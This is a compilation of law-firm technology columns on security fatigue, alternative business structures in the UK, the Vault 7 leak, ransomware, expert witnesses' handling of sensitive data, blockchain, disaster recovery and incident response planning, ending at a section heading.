People are inherently lazy. After all, why do something today that you can put off until tomorrow? Users hate to do anything that would slow down their access to their computer or data. That means they would much rather just sit at a keyboard and start to surf the Internet instead of entering logon credentials and then entering a second factor. How many times have you been tired of the constant password changes only to resort to using one you know you’ll remember and have previously used? Didn’t feel like creating a new account so passed on that online purchase? You are not alone.

A recent study from the National Institute of Technology (NIST) found that the majority of typical computer users experience security fatigue, which leads to risky computing behavior at work and in their personal lives. Security fatigue is defined as a reluctance or weariness to deal with computer security. So what does this mean for law firms? A balanced approach is the way to go. If you make things too difficult for the users, they will find ways around the security measures.

Noted security guru and cryptographer Bruce Schneier says “Stop trying to fix the user.” As Bruce said in a recent blog post, “The problem isn’t the users: it’s that we’ve designed our computer systems’ security so badly that we demand the user do all of these counterintuitive things. Why can’t users choose easy-to-remember passwords? Why can’t they click on links in emails with wild abandon? Why can’t they plug a USB stick into a computer without facing a myriad of viruses? Why are we trying to fix the user instead of solving the underlying security problem?”

We need to be smarter in how to design secure environments for law firm users. Forget about the security warnings. Do you really think anyone reads the pop-up dialog box that warns that the certificate is expired or not verifiable? The user doesn’t really care. They would much rather see a “get rid of me” button so they can get to the website. Passwords aren’t much better, especially for sites that are rarely visited. The user will elect to save the password in the browser (never a good idea and a huge security risk) or constantly use the “I forgot my password” link, which means they are falling back on the security of their e-mail system since that’s where the reset link will go. User’s aren’t going to pay attention to links either, whether valid or from phishing attacks. Users know that a link gets you where you want to go so we’ll never fully teach them to be suspicious of links.

We need to stop trying to protect the user from themselves. In order to combat security fatigue, we need to make the environment more secure no matter what the user does. Virtual environments and sandboxing will keep the applications running in a “walled” off area that is separated from the user’s system so you don’t have to worry about embedded malware. Automatic updates will help too, since the user won’t have to remember to manually apply updates.

The NIST study provided evidence for three ways to help reduce security fatigue.

1. Limit the number of security decisions a user needs to make
2. Make it simple for a user to choose the right security action
3. Design for consistent decision making whenever possible

We will never be able to provide a 100% secure environment, but we can get a heck of a lot closer by reducing security fatigue and removing the user from the decision making process as often as possible.

Recently, author Nelson had the pleasure of interviewing David Beech, the CEO of the professional services firm Knights in the UK. David has led the business, originally a law firm, since 2011. His vision for Knights is to become the leading regional professional services business in the UK.

The interview took place on the Legal Talk Network podcast (The Digital Edge: Lawyers and Technology) with co-host Jim Calloway, available at http://legaltalknetwork.com/podcasts/digital-edge/2017/01/will-alternative-business-structures-u-k-law-firms-cross-pond/.

By way of introducing David, he qualified as a corporate lawyer in 1990 and in the late 90’s turned to law firm management until 2004 when he left the practice of law to raise and manage a private equity fund. He brought these skills together by leading Knights to become the first professional services firm to raise external private equity investment in June of 2012 and to become the fastest growing commercial firm in the UK.

According to David, the UK Legal Services Act, passed in 2007, and subsequent regulations issued in 2012, resulted in hundreds of law firms applying for Alternative Business Structure (ABS) licenses. ABS differs from how law firms in the US operate in two fundamental ways: Lawyers and non-lawyers can share in the management and control of these businesses and they can have non-lawyer investment. But David said that, after the flood of license applications (about 600 of them), only about 25 law firms actually used the licenses once they had them, bringing in external, non-lawyer investors who became partial owners of the ABS.

David is fond of saying that Knights is a model of merit, not of tenure. In fact, he calls Knights a meritocracy. As Knights became more of a business than a traditional law firm, overhead went down. There are 400 lawyers but there are no secretaries. Lawyers handle their own correspondence and billing. They have found that a lawyer can generate a bill in about three minutes. All lawyers receive technology training to make them more efficient. They also work to measure return on marketing efforts and most importantly, they receive extensive training in client engagement which he believes is critical to client retention.

When Knights underwent its transformation, it was recovering 74% of chargeable time recorded. Today, it recovers 92% of chargeable time recorded. Impressive, yes? 60% of their engagements are flat fee. Their focus is away from showing fees per tasks on bills – they are careful to show all chargeable time instead. Clients have proven to appreciate the amount of work done – and of course, the successful results!

Unsurprisingly, the firm achieves efficiencies by stressing project management. It also responded to clients’ desire to be given “more for less” by bringing in paralegals to do lower level work.

As they converted over to the new system, there was almost no loss of partners. There were certainly emotional struggles going from being owners to being employees, but the lawyers found (to their surprise) that most of them were not faced with financial negatives. In fact, those who produced well, which was the majority, got steady and gratifying salary increases – and were relieved of all the headaches of management, including a lot of boring meetings and details, and therefore able to focus on the practice of law. Clients also enjoyed the increased access to their lawyers.

Currently, Knights has 104 lawyer partners, all salaried employees. With no equity profit sharing, it is, in David’s judgment, much easier to attain a “team” philosophy. Work is shared between lawyers, associate and paralegals – they brought in 140 paralegals after they transitioned. No one has big fancy offices. They work together side by side, sharing the tasks of client representation. David says they have had to “manage out” people who cannot seem to become part of a team because they are focused on a hierarchical structure.

David doesn’t claim all this was easy. Business people and lawyers react differently. Lawyers want to divvy up pots of money at year’s end and business people want to reinvest monies in the firm. They had to work hard to establish a new culture – as David says, “to win their hearts and minds”. The lawyers learned that the business managers, and there are not many of them, had no interest in interfering in legal work. Slowly, the vast majority of lawyers found themselves adopted the team outlook and culture.

In the US, we hear the fear that there will be less emphasis on legal ethics in an ABS, but David refutes that – in fact he calls that fear “rubbish.” He believes ethical compliance is greater now that managers monitor it. Without strong ethics, the firm brand – and therefore business – would suffer.

Another American concern is access to justice. David acknowledges that his firm is a business to business law firm, so he is unable, based on his experience, to speak to that issue. He does acknowledge freely that access to justice is as much a problem in the UK as it is in the US.

One notable ABS failure, in Australia, was Slater and Gordon. David’s view is that they simply made a mistake by buying the professional services arm of the British insurance claims processor Quindell for too much money.

When asked about ABS coming to the US, David said Investors and clients will find a way to compete with lawyers whether or not ABS is used. Change will simply happen driven by clients and investors. Not to embrace ABS is, in his view, missing an opportunity. It is a better and safer path to keep legal services in a regulated environment. Lacking a crystal ball, he was reluctant to predict whether ABS will come to our side of the pond, but he certainly took note of the ferocity of the resistance to ABS in the US. He notes mildly that American lawyers seem to see ABS as a threat to their profession and seem blind to the opportunities offered by an ABS.

One thing David noted at the end of the interview was that he is surprised that more American lawyers haven’t visited him to “chat him up” about running a successful ABS. So if you find yourself in the UK, he invites you to come and see him. I’m pretty sure he can come up with a wonderful piping hot cup of tea.

Some days are just more interesting than others. You could almost hear the mournful wailing of spooks (the CIA kind) as WikiLeaks released thousands of documents describing sophisticated software tools used by the Central Intelligence Agency to break into smartphones, computers and even Internet‑connected televisions.

The New York Times reported that the documents, at first review, appeared to be authentic. The initial release, which WikiLeaks said was only the first part of the document collection, included 7,818 web pages with 943 attachments. The entire archive of CIA material consists of several hundred million lines of computer code according to WikiLeaks.

Initial reports overstated what the technology could so, suggesting that the encryption for popular apps such as Signal and WhatsApp had been compromised. As the details become more clear, it was noted that the apps themselves were NOT compromised. Rather, if the phone was compromised, by malware for example, encryption doesn’t do you any good since the app has to decrypt the message for you to read it, thus allowing a successful attacker to read it. The real news was that both Androids and iPhones have allegedly been compromised by the CIA and allied intelligence services, meaning that apps such as Signal and WhatsApp cannot protect your privacy.

The source of the documents was not named. WikiLeaks said the documents, which it called Vault 7 (where DO they come up with these monikers?), had been “circulated among former U.S. government hackers and contractors in an unauthorized manner, one of whom has provided WikiLeaks with portions of the archive.”

WikiLeaks said the source, in a statement, set out policy questions that “urgently need to be debated in public, including whether the CIA’s hacking capabilities exceed its mandated powers and the problem of public oversight of the agency.” The source, the group said, “wishes to initiate a public debate about the security, creation, use, proliferation and democratic control of cyberweapons.”

The documents are dated from 2013 to 2016. WikiLeaks, which has sometimes been accused of recklessly leaking information that could do harm, said it had redacted names and other identifying information from the collection. It said it was not releasing the computer code for actual, usable cyberweapons “until a consensus emerges on the technical and political nature of the C.I.A.’s program and how such ‘weapons’ should be analyzed, disarmed and published.”

One revelation is about a program called Weeping Angel which uses Samsung “smart” televisions as covert listening devices. According to the WikiLeaks news release, even when it appears to be turned off, the television “operates as a bug, recording conversations in the room and sending them over the internet to a covert C.I.A. server.” We had previously speculated that this might be true but take no pleasure in being right. As it turns out, CNET reported that the hack only works on certain versions of firmware and you have to have physical access to the TV.

Another program described in the documents, named Umbrage, is a voluminous library of cyberattack techniques that the CIA has collected from malware produced by other countries, including Russia. According to the WikiLeaks release, the large number of techniques allows the CIA to mask the origin of some of its cyberattacks and confuse forensic investigators. This is another great fear of ours. If we are under a cyberattack, how do we respond with assurance that we have traced the attack back to its true source? And God help us if we have autonomous machines with AI helpfully doing all these investigations for us. We truly “ride the lightning” in the cyberwarfare era.

Despite all the reports of the CIA’s hacking ability, the real message is to make sure your devices have the most recent versions of firmware and software. In other words, update, update, update. So far, all of the reported vulnerabilities have been patched by the vendors. In fact, Apple, Google and Microsoft have said that their products are already safe from most of the tools identified in the WikiLeaks documents. An ironic outcome of the WikiLeaks dump has China very concerned that the United States has the ability to hack into devices made by Chinese companies. The WikiLeaks documents mentioned that network routers manufactured by Chinese firms Huawei and ZTE could be hacked using the CIA tools. Chinese Foreign Ministry spokesman Geng Shuangsaid said, “We urge the U.S. side to stop listening in, monitoring, stealing secrets and internet hacking against China and other countries.” Apparently, what’s good for the goose isn’t good for the gander.

The FBI says that ransomware nets cybercriminals $1 billion a year. No wonder so many people want a piece of that pie.

Computerworld recently reported that hackers spreading ransomware are getting greedier. In 2016, the average ransom demand to provide the decryption key for encrypted data rose to $1,077, up from $294 the year before, according to a report from security firm Symantec. Symantec also reported a 36% increase in ransomware in 2016 from the prior year. We are aware of small law firms in Virginia that paid $1200 and $3000 to get their data back – the damage being furthered by the length of time it took to restore the data.

Helping to fuel the ransomware boom is the digital black market, where hackers can sell ransomware kits for as little as $10 and as much as $1,800, making it easier for other cybercriminals who can’t code to get a piece of the action.

Cybercriminals also spread ransomware through exploit kits, or automated hacking toolsets, that operate on compromised websites. The kits can work by scanning a victim’s web browser for any unpatched software vulnerabilities and then exploiting them to serve ransomware. We are guessing that most readers didn’t know that this was an attack surface – most people think ransomware can only be contracted by opening an e-mail and clicking on a link or attachment – that’s certainly the most common way, but there are others!

Symantec’s report found that 34 percent of victims pay the ransom. However, only 47 percent of that number reported getting their files back. In a business where trusting the bad guys is important, figures like these may diminish the number of victims willing to “pay up.”

Dark Reading also recently reported that about 40% of small and midsized businesses hit with ransomware paid their attackers, but less than half got their information back. This data came from a Bitdefender survey of 250 IT pros working in small and medium businesses (SMBs).

This survey, conducted by Spiceworks, discovered that one in five SMBs was hit with a ransomware attack within the past 12 months. Of the 20% targeted, 38% paid attackers an average of $2,423 to release their data. Less than half (45%) got their information back. The honor among thieves is clearly evaporating.

As attackers seek weaker victims, SMBs are favored targets. Larger businesses have strongly engineered backups and high level security tools. Researchers have found SMBs are appealing targets for ransomware because they handle the same sensitive business information (customer data, financial records, product info) as larger organizations, but lack the strong security measures to protect it. Attackers know they’re more likely to receive payment from SMBs, which have more sensitive data than consumers.

E-mail, cited by 77% of SMBs – as mentioned above – is the most popular vector of attack.

Most SMBs hit with ransomware attacks were able to mitigate the attack by restoring data from backup (65%), or through security software or practices (52%). One-quarter of those targeted could not find a solution to address the infection and lost their data as a result. Since our clients are largely SMBs, we can affirm that they are more vulnerable – and sometimes resist a well-engineered backup system because they don’t fully appreciate the danger and are resistant to the costs – which tend to seem very minor once they’ve become a ransomware victim. After being hit with ransomware, they tend to ask us for a proposal to enhance their backup system so they can in fact get their data back.

Though the FBI and other law enforcement agencies counsel ransomware victims not to pay, if they haven’t properly engineered their backups to recover the data, many say they have no choice but to pay. Payments (usually in bitcoin) used to be in the $300-$500 range but we are seeing much larger demands these days. Some entities are even stockpiling bitcoins so they can pay the cybercriminals quickly. Some entities make a business decision that the cost of paying the ransom is cheaper than being out of business for some period of time while data is recovered. A good example is hospitals, which are likely to be sued if there are errors made because of the inability to get to data.

While the FBI counsels victims not to pay, agents are apt to whisper “but you gotta do what you gotta do.”

Calls we’ve received from ransomware victims are panicky conversations – and most of the panic stems from not having a properly engineered backup. This is a classic case – don’t be pennywise and pound foolish. Invest in a good backup system and, even if no one is completely impervious to ransomware, you’ll sleep better knowing that you can quickly recover from a ransomware infection.

Not always. There was a recent case in which confidential data was not, to put it mildly, well handled. The corporate defendant, a mortgage servicer, was accused of violating a consumer’s privacy rights based on the manner in which it handled collection calls. The defendant protected its customer data with layers of network security consistent with best practices and ISO guidelines. During discovery, the plaintiff’s experts received the calling data and copies of the customer service call recordings.

Both experts had unrelated full-time day jobs. Their expert witness work was a side business run out of their homes. Neither expert had a technical degree, and neither had taken a course in data security for over a decade. Both experts stored the sensitive case data in their homes. There were no locks on the doors to their home offices, so anyone in the houses had access to the drives. Neither expert was familiar with the basic ISO standards relating to data security. Neither had a written data security plan for their home network, and no outside company had ever performed vulnerability or penetration testing on their networks. One expert had no automatic intrusion detection software on his network. Both routinely produced data with sensitive PII (personally identifiable information) in unencrypted form.

The produced debt-collection calls included highly personal discussions in which debtors explained why a mortgage was in default, such as health or financial problems. One expert testified that he kept these recordings on an unencrypted portable laptop and accessed it on his home and public Wi-Fi networks. He also produced the call recordings to a third party to obtain technical assistance. The third party was not asked to execute the protective order, and that data presumably still resides on the third party’s servers.

Well, you get the message. Expert witnesses, including us, routinely receive highly sensitive PII for review and analysis. Sensitive PII (SPII) is data that, if lost, compromised or disclosed without authorization, could result in substantial harm or embarrassment to the individual.

Attorneys cannot ignore how their experts manage the data produced to them. When highly sensitive data is produced in a lawsuit, it is removed from the protected network environment built by the data’s owner and produced to the lawyers on the other side. The manner in which it is produced is up to the producing party. Sometimes the data is scrubbed of identifying information, such as names and dates of birth, but not always. Sometimes it is produced on encrypted drives, but again, not always. Instructions are rarely given to an expert regarding the manner in which to store the data or the type of security controls that need to be employed to keep it safe from unauthorized disclosure. That is certainly true. I can only recall a handful of cases where attorneys have given us explicit instructions.

Confidential data produced in a lawsuit is often subject to a protective order that contains generic language that the data will be kept confidential. Protective orders typically do not specify the security measures that the receiving party needs to have in place. The promise to keep the data protected is considered enough.

Under most protective orders, the receiving party has the right to produce the confidential information it receives to its experts in the case. Those experts are in turn required to sign the protective order and promise to protect the data. Again, the promise to keep the data protected is considered enough.

Experts at sophisticated firms generally have very competent IT and cybersecurity support. They could still be breached, but it is less likely than when engaging experts who are self-employed or who work in small firms with limited support.

Concrete suggestions?

Pay attention to physical security. Our forensics lab requires a prox card and a registered fingerprint to enter. Entries into or out of the lab are video recorded. There is a dual authenticated safe in the lab for high profile cases. Only three of us have access to that safe. We have a security system with motion sensors – and the police will be summoned unless someone with authority quickly acknowledges an equipment problem or a mistake (such as arming the system when someone is still in the lab – and yes, of course that has happened). We have a human receptionist monitoring the front door – in addition to more surveillance cameras. The building itself is locked nights and weekends.

Pay attention to logical security. Our evidence is on standalone offline hard drives or on a NAS unit which has no Internet access. The local network in the forensics lab is dedicated to forensic usage, unconnected to our corporate network. There are software and hardware protections for the lab network as well.

Pay attention to production security. It is the way of the world that most of our productions, by the instructions of our clients, are made via Dropbox. It makes sense since it is instantly available though one must trust that authorized access is not given by the receiving party to anyone who shouldn’t have it. All production files are encrypted using 7-Zip before being placed in Dropbox with the password given via phone or a separate e-mail (not the e-mail containing the Dropbox link). If a file is not so large that it cannot be accommodated by Mimecast’s Large File Send, we may use that – the data is encrypted as part of the process.

If we use the old school method of shipping drives, they are always encrypted.

There may be more security measures that are not coming to mind, but those are the basics. And, of course, if there is a court order with specific mandates, that order must be strictly adhered to. Most of them, as noted, do not require specifics measures.

Several years ago, a Canadian attorney and good friend of ours, invested $10,000 in bitcoin. Clearly, he is a lot smarter than us. We can’t even imagine the extent of his profit – several days before we started to write this article, bitcoin hit an all-time high of $4,991.66 on September 2, 2017. It is down slightly as we write, but our friend certainly hit a jackpot.

We become aware of bitcoin wallets a few years ago, as husbands (mostly) began to hide assets from their soon-to-be ex-wives in those wallets. And then came a barrage of ransomware attacks. Law firm after law firm was paying the ransom ($300-$500 in the early days and $1500-$3000 today). The cybercriminals usually want the ransom in bitcoin. To our amazement, there are now bitcoin ATMs available in local gas stations and laundromats complete with posted instructions on creating a bitcoin wallet for the Bitcoin novice.

In July, there were reports of a Citrix UK study which found that a third of UK companies were stockpiling digital currency, mostly in bitcoins, to pay the ransom (an average of approximately $176,000) if they became victims of a ransomware attack.

At the 2017 ILTACON conference, artificial intelligence wasn’t quite kicked to the curb, but the buzz around blockchain became very loud indeed. In the last several months, it has become increasingly clear that blockchain is a transformative technology that is going to make substantial changes in the practice of law.

What is blockchain?

There are arguments about the definition but we liked this one from TechTarget:

“Blockchain is a type of distributed ledger for maintaining a permanent and tamper-proof record of transactional data. A blockchain functions as a decentralized database that is managed by computers belonging to a peer-to-peer (P2P) network. Each of the computers in the distributed network maintains a copy of the ledger to prevent a single point of failure (SPOF) and all copies are updated and validated simultaneously.

In the past, blockchains were commonly associated with digital currencies, and Bitcoin in particular. Today, blockchain applications are being explored in many industries as a secure and cost-effective way to create and manage a distributed database and maintain records for digital transactions of all types.”

The second paragraph of that definition is particularly interesting because law firms are now “getting” the possibility of blockchain. While it was first utilized by Coinbase when bitcoins were introduced in 2009, we now realize that the same technology can be used for contracts, real estate transactions, bank and stock market transactions – and the list goes on and on.

Back to Bitcoin

Why back to Bitcoin? Well, it has already taught us a number of lessons. The cryptocurrency market is highly volatile. And as the number one cryptocurrency (Ethereum’s ether is generally held to be second), Bitcoin is receiving unwelcome attention. As was reported in August 2017, the IRS is coming after those who are profiting from Bitcoin transactions (legally or illegally, they are all supposed to be reporting income) and those who have made monies by investing in bitcoin.

The gap between the number of people dealing in bitcoin and the number declaring income from it is wide – very, very wide. The IRS said in court documents that between 2013 and 2015, fewer than 900 people per year reported income on Form 8949, which is used to account for “a property description likely related to Bitcoin.” That compares pathetically to the number of people using Coinbase – “the largest exchanger in the US of bitcoin into US dollars,” according to the government – with 4.8 million users and 10.6 million wallets.

Since Coinbase is under heavy scrutiny, many criminals (and others} have left Bitcoin in favor of other virtual currencies like Zcash, which promises to “fully protect the privacy of transactions using zero-knowledge cryptography,” or Monero, which says it offers “secure, private, untraceable currency.”

Also in August, the SEC issued its most comprehensive public guidance to date on digital assets such as cryptocurrencies and tokens. Key points:

• Initial Coin Offerings (ICOs) are required to be registered with the SEC if the digital assets are securities offered or sold in the U.S.
• Digital assets can be evaluated for securities status using traditional securities law criteria
• Automated functions through smart contracts or other code remain subject to securities laws
• Companies dealing in digital assets should consider seeking counsel as to whether the digital assets are securities
• Companies dealing in digital currencies may need to register as broker-dealers, securities exchanges, or alternative trading systems
• Companies investing in digital assets and advising on investment may need to register as investment companies or investment advisers

The SEC did not conclude that all tokens and cryptocurrencies are securities, but confirmed how the SEC would evaluate cryptocurrencies. The SEC also noted that form should be disregarded for substance and that economic realities should be a key to the analysis. Thus, any party contemplating a future ICO that is available to investors located in the U.S. should analyze the extent to which the offered asset could be considered a security. This analysis should reach the business model underpinning the offered assets and not be limited to the white paper description of the offered digital assets.

Therefore, companies doing business with digital currencies with U.S. investors might be in violation of U.S. securities laws and may be required to register with the SEC and to comply with applicable securities regulations.

And hold your hat – there are now, according to a September 4^th story in Naked Security, more than 900 cryptocurrencies are currently in existence. Conventional banks would do well to be rattled by that. So far, the estimated $150 billion value of the top 20 cryptocurrencies is still a tiny fraction – 3% – of the $5 trillion in conventional currency circulating every day. But it is growing.

Blockchain and the Practice of Law

On August 15th, a group of law firms and technology companies announced the formation of the Global Legal Blockchain Consortium. The consortium will work to drive the adoption and standardization of blockchain in the legal industry, with the larger goal of improving the security and interoperability of the global legal technology ecosystem.

As noted in an Above the Law post by our friend Bob Ambrogi, members of the consortium include the law firms Baker Hostetler and Orrick, IBM Watson Legal, and the newly formed company Integra Ledger, which hopes to become the ledger used throughout the legal industry for blockchain digital identities.

The consortium’s three goals for the future of blockchain in legal:

• An interoperable and secure global legal industry using blockchain technology
• Agnostic as to software, agnostic as to document management systems, and agnostic as to blockchain
• Universal, blockchain-based identities for law – client identity, matter identity, document identity

Drummon Reed, chief trust officer at Evernum, said, “With a blockchain, every transaction is digitally signed, every transaction is chained together, and it’s replicated on hundreds of computers around the world with digital signatures,” noting that Bitcoin has never been hacked in its nine years of existence. But please do read to the end of this story . . .

Another speaker, David Fisher, the founder and CEO of Integra ledger, said that the key application of blockchain in law will be universal legal identities. Virtually anything or anyone will have a unique digital identity — legal matters, documents, individuals, entities, billing entities, and more. The identities will provide proof of existence and uniqueness, without identifying details, that can be used by all Integra-compliant software.

The consortium’s vision, Fisher said, is for every major law firm and corporate legal department to be a node in the blockchain with a synchronized copy of all the sequential ledger entries of identities. This will lead, in turn, to an open market for innovation in which these Integra identities will be referenced by:

• Other blockchains
• Legacy software companies, in order to add functionality
• Smart contracts
• Custom apps developed by corporate legal departments and law firms
• Applications developed by other consortia and working groups

The newly created Law Firm Innovation Index measures law firm innovation based on Google advanced searches for indications of innovation on the websites of the world’s largest law firms. The category that garnered the greatest number of hits was blockchain, with more than double the average number of hits than AI. Now does that mean that they are actually doing a lot with blockchain? No. Not necessarily. But they know where the action is and want to be seen at the forefront of this new movement.

This blockchain train has bolted out of the station with amazing speed. Maybe unseemly speed. As we were finishing this article, it was reported that a piece of malware called Trickbot was targeting cybercurrencies. This could be a challenge to the stability and reliability of the blockchain platform which must determine how it will figure out if cryptocurrency is stolen or acquired from a malware attack since every coin has a unique code itself.

If you build it, they will come. We refer, of course, to cybercriminals.

From co-author Nelson: Normally, I write SLAW columns with Sensei VP John Simek, but in light of the recent and horrific disasters experienced by American law firms, I teamed up with Jim Calloway, Director of Management Assistance Program at Oklahoma Bar Association, to offer these disaster recovery tips.

1. Immediately after a disaster, there is only one thing that matters – human life. Do what you can possibly do to help those in need and to ensure the safety of those who work with and for you. Supply your employees with all the support resources you can.
2. Establish communications. Hopefully, you have a disaster recovery plan (if not, preparing and adopting a plan should go on your priority list now). Follow the plan, which should include multiple communication options – via e-mail, text, phone calls or a website. Someone should be responsible for tracking information about those who have reported they are safe and reporting those who have not. Consider contracting with a service that automates notifications and responses. Everyone should be reminded of their roles in the disaster recovery. Someone should be contacting local government authorities. You may need to have the post office hold your mail or send it to a different address – assuming mail is being delivered. Your plan should also address who is responsible for contacting FEMA, the courts, and opposing counsel (to reschedule dates as needed), active clients, your insurance company, bank, landlord and significant vendors, including your payroll service. You will need to ensure that staff and attorneys understand how to fulfill their duties if communications are widely disrupted.
3. Communicate with your clients. As recent events have shown, this may not be easy. You may not have the ability to call, text, or e-mail. One alternative, since most firms do not host their own website, is to have a temporary home page set up explaining the status of your firm/practice and advising your clients how (or if) they are able to contact you. If your office is unusable, make sure the first person who has access puts up a sign with temporary contact information in large letters on the door or frontage. Do not just tape a piece of paper there. Use nails or even (gulp) spray paint. You may also want to advise clients of how courts are handling delays during the recovery period until communications are restored.
4. Hopefully, you have your law firm data stored in the cloud. One of the advantages of cloud based practice management solutions is that you should be able to access your data in the cloud once you have an Internet connection. Needless to say, your “cloud” solution should not be storing your data in your immediate geographic area unless you have a secondary cloud which is well out of harm’s way.
5. If your e-mail is down, you certainly have a problem. Before the disaster strikes, you should have made sure that you have engaged an e-mail service vendor that “spools” (retains) your e-mail for delivery when you have power or better yet, synchronizes with your mailbox and provides an alternate mail transport mechanism. Such vendors often provide spam filtering, phishing prevention, the ability to send large files, encryption, etc. Spread the word as quickly as possible when the spooled e-mail is released – this is often done best by phone or text since people may not be checking their e-mail regularly if service has been unavailable for any length of time. If you use a service that provides 100% e-mail availability, clients will not even know that your primary e-mail technology was down.
6. If the disaster lasts for some time, how will you pay your employees? We actually saw airlifts of money during Katrina. Whatever your payment plan, implement it. If your cash flow allows, be generous with modest advances to employees to help them recover.
7. Make sure your system passwords are stored (encrypted) in the cloud – you may need them as part of the recovery. Get a full report from your IT folks as to what is functional, what is not and the proposed path to getting all systems up and running. Lease or buy any equipment that needs replacement.
8. If laptops or other mobile devices have been lost in the disaster, remote wipe them to ensure the security of the data. They should all be encrypted as well to minimize unauthorized access.
9. Post-disaster looting and destruction is a fact of life. If you have an on premise network and it is not well secured, secure it as soon as possible after the disaster is over. When it is safe to go to your office, take photos or videos of all damage for insurance purposes and remove (if necessary) the waterproof and fireproof safe which holds all your critical documents – which are hopefully replicated and encrypted in the cloud.
10. If you still have a functional office, share what space you can with other attorneys. If you do not, seek out your colleagues who may have functional offices and ask for help. Alternatively, arrange for leased space. If your losses are great, you may be eligible to file a claim for emergency relief – investigate this avenue as it may be more immediate than any monies you receive from your insurance company.
11. Accept assistance gratefully. We all like to think of ourselves as independent. We solve problems for others. But there’s no shame in receiving aid. Your bar association will be activating resources to assist you. Accept that bottle of water or free meal from aid workers if you need it. Ask colleagues if you are in need. The disasters bring out the worst in people, but also the best.
12. Take care of yourself. Recover from a disaster is a marathon, not a sprint. Lawyers tend to “overwork” themselves out of difficult situations. Rest and good nutrition is more important now than ever. Disaster brings an enormous amount of stress to you and everyone in the affected community. Be kind and generous. Forgive the inappropriate behavior of others. Hug your family members.

Further resources from the American Bar Association may be found on the resources page for the ABA’s Committee on Disaster Response and Preparedness.

“When, not if.” This mantra among cybersecurity experts recognizes the ever-increasing incidence of data breaches. In an address at a major information se­curity conference in 2012, then-director of the Federal Bureau of Investigation (FBI) Robert Mueller put it this way: “I am convinced that there are only two types of companies: those that have been hacked and those that will be. And even they are converging into one category: companies that have been hacked and will be hacked again.”

Mueller’s observation is true for at­torneys and law firms as well as small businesses through Fortune 500 companies. There have now been nu­merous reports of law firm data breaches. The FBI has reported that it is seeing hundreds of law firms being increasingly targeted by hackers. Law firm breaches have ranged from simple (like those re­sulting from a lost or stolen laptop or mobile device) to highly sophisticated (like the deep penetration of a law firm network, with access to everything, for a year or more).

Lawyers and law firms are begin­ning to recognize this new reality, but all too often they expose themselves to unnecessary risk simply because they don’t have a response plan for security incidents and data breaches. Attorneys have ethical and common law duties to employ competent and reason­able measures to safeguard information relating to clients. Many attorneys also have contractual and regulatory require­ments for security. Attorneys also have ethical and common law duties to notify clients if client data has been breached.

Compliance with these duties includes implementing and maintaining compre­hensive information security programs, including incident response plans, for law practices of all sizes, from solos to the largest firms. The security programs and response plans should be appropri­ately scaled to the size of the firm and the sensitivity of the information.

THE OLD MANTRA: KEEP THE BARBARIANS AT BAY

In a more innocent time, we really thought we could keep the barbarians outside the walls that guard our data. The analogy was protecting the network like a fortress, with strong perimeter defenses, sometimes compared to walls and moats. Alas, those days are gone.

For years, the emphasis was on keeping villains—cybercriminals, state-sponsored agents, business espionage spies, and hackers—out. We went from fairly simple antivirus software and firewalls to more sophisticated antivirus software and next-generation firewalls, and, finally, to enterprise anti-malware security suites, next-generation security appliances, data loss protection and other strong technical defenses. The widespread use of mobile devices and remote connectivity, making data available outside protected networks, has added new challenges for defense.

The defensive tools have gotten more sophisticated and more effective. Sadly, what we have learned is that all the would-be intruders were not only matching the good guys step for step, they were outpacing them.

It took a surprisingly long time for everyone to “get it”—but in the end, the security community realized that if the bad guys are smart enough and target a particular entity, they are likely to be able to successfully scale the walls we built to keep them out. And with that realization, “detect and respond” became the new watchwords in cybersecurity.

Mind you, we are still trying to keep the bad guys out—that is our first line of defense. But now that we know that our first line of defense is too often a Maginot Line for sophisticated attackers, we have moved forward in our thinking.

Although detection and incident response have been necessary parts of comprehensive information security for years, they previously had taken a back seat to protection. Their increas­ing importance is now being recognized. Gartner, a leading technology consult­ing firm, has predicted that by 2020, 60 percent of enterprises’ information secu­rity budgets will be allocated for rapid detection-and-response approaches, up from less than 10 percent in 2014.

THE NEW MANTRA: IDENTIFY, PROTECT, DETECT, RESPOND, RECOVER

The increasing recognition of the im­portance of detection and response has been evolving for a number of years. It is a core part of the National Institute of Standards and Technology’s (NIST) Framework for Improving Critical Infrastructure Cybersecurity, Version 1.0, that was released in February 2014 (www.nist.gov/document-3766).

Although the framework is aimed at security of critical infrastructure, it is based on generally accepted security principles that can apply to all kinds of businesses and enterprises, including law firms. It provides a structure that organizations, regulators, and custom­ers can use to create, guide, assess, or improve comprehensive cybersecurity programs. The framework, “created through public-private collaboration, provides a common language to address and manage cyber risk in a cost-effective way based on business needs, without placing additional regulatory require­ments on businesses.”

The framework allows organizations—regardless of size, degree of cyber risk, or cybersecurity sophistication—to apply the principles and best practices of risk management to improve the security and resilience of critical infrastructure (as well as other information systems). It is called “Version 1.0” because it is sup­posed to be a “living” document that will be updated to reflect new technology and new threats—and to incorporate “les­sons learned.” (NIST released drafts of Version 1.1 for public comment in January and December of 2017 and plans to release Version 1.1 in early 2018.)

The core of the framework, its magic words, are “identify, protect, detect, re­spond, and recover,” which should shape any law firm’s cybersecurity program.

“Identify and protect” was where we started in the early days of cybersecurity—and while those words are still important, “detect and respond” have surged forward as a new focus—along with, of course, recovering from security breaches, no easy task. It is especially tough if you don’t know you’ve been breached—and the average victim has been breached for seven months or more before the breach is discovered!

INCIDENT RESPONSE PLANS

The core of the respond function is ad­vance planning. This means attorneys and law firms need a plan, usually called an incident response plan (IRP), which often is focused on data breaches, but “incidents” can refer to ransomware, at­tempted hacks, an insider accessing data without authorization, or a lost or stolen laptop or mobile device.

Most large firms now have these plans in place, but many smaller firms do not. More and more, clients and insurance companies are asking to review law firms’ IRPs. In the face of ever-escalating data breaches, now is a good time to de­velop and implement a plan or to update an existing one. After all, football teams don’t get the playbook on game day.

The problem with all plans is that they may not survive first contact with the enemy. That’s okay. Far worse is hav­ing no plan at all and reacting in panic with no structure to guide your actions. The first hour that a security consultant or law enforcement officer spends with a business or law firm after the discov­ery of a data breach is very unpleasant. Kevin Mandia, the founder of Mandiant (www.fireeye.com) a leading security firm, has called it “the upchuck hour.” It is not a happy time.

Don’t rely on a template IRP. No two law firms are identical, and all have different business processes, network infrastructures, and types of data. Al­though templates may serve as a starting point, an IRP must be customized to fit the firm—the smaller the firm, the shorter the plan is likely to be. For a solo practice, it may just be a series of checklists, with who to call for what. Books and standards have been writ­ten about IRPs. (See “Further Resourc­es” below for a few of our favorites.)

Qualified professionals also can be con­sulted for more details. The following is a condensed and, we hope, digestible overview.

THE ELEMENTS OF AN IRP

